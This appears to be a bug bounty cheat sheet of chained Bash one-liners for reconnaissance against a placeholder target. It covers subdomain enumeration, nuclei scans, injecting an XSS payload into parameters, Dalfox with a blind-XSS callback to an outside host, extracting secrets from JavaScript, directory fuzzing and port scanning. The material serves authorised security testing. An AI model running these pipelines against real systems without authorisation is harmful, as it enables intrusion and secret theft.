Skip to content

Recon Pipeline

Chained recon one-liners for bug bounty

Bash

Description

Battle-tested one-liner command pipelines that chain multiple tools together for efficient bug bounty reconnaissance. These workflows automate the process from initial discovery through vulnerability scanning.

Full Recon Pipeline

BASH
# Subdomain → Alive → Vulnerability scan
subfinder -d target.com -silent | httpx -silent | nuclei -s critical,high

# Comprehensive subdomain discovery
(subfinder -d target.com -silent; amass enum -passive -d target.com; assetfinder --subs-only target.com) | sort -u | httpx -silent > alive.txt

Parameter Discovery → Exploitation

BASH
# Find params and test XSS
paramspider -d target.com | qsreplace "<script>alert(1)</script>" | httpx -silent

# Params to Dalfox
gau target.com | grep "=" | sort -u | dalfox pipe --blind "https://xss.hunter"

Subdomain Takeover Check

BASH
subfinder -d target.com | httpx -silent | nuclei -t takeovers/

JavaScript Analysis

BASH
# Find all JS files
katana -u https://target.com -jc | grep "\.js$" | httpx -silent | tee js-files.txt

# Extract secrets from JS
cat js-files.txt | while read url; do python SecretFinder.py -i "$url" -o cli; done

Mass Directory Fuzzing

BASH
cat alive.txt | xargs -I {} ffuf -u {}/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200 -t 50

Port Scan → Service Enum

BASH
# Fast port scan then detailed nmap
rustscan -a target.com -- -sV -sC -oA detailed-scan